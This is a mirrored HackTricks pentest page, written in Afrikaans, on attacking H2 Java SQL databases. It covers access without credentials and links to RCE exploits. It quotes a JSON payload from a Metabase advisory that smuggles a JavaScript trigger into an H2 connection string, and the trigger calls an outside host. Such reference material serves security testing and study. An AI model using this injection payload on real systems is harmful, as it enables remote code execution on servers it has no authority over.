mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
37 lines
1.4 KiB
Markdown
37 lines
1.4 KiB
Markdown
# H2 - Java SQL-databasis
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|
|
|
|
Amptelike bladsy: [https://www.h2database.com/html/main.html](https://www.h2database.com/html/main.html)
|
|
|
|
## Toegang
|
|
|
|
Jy kan 'n **nie-bestaande naam van 'n databasis** aandui om 'n **nuwe databasis sonder geldige akrediteer** (**nie-geverifieer**) te **skep**:
|
|
|
|
.png>)
|
|
|
|
Of as jy weet dat 'n **mysql loop** en jy weet die **databasisnaam** en die **akrediteer** vir daardie databasis, kan jy dit net benader:
|
|
|
|
.png>)
|
|
|
|
_**Truk van die boks Hawk van HTB.**_
|
|
|
|
## **RCE**
|
|
|
|
As jy toegang het om met die H2-databasis te kommunikeer, kyk na hierdie exploit om RCE daarop te kry: [https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed](https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed)
|
|
|
|
## H2 SQL-inspuiting na RCE
|
|
|
|
In [**hierdie pos**](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) word 'n payload verduidelik om **RCE via 'n H2-databasis** te verkry deur 'n **SQL-inspuiting** te misbruik.
|
|
```json
|
|
[...]
|
|
"details":
|
|
{
|
|
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
|
|
"advanced-options": false,
|
|
"ssl": true
|
|
},
|
|
[...]
|
|
```
|
|
{{#include ../../banners/hacktricks-training.md}}
|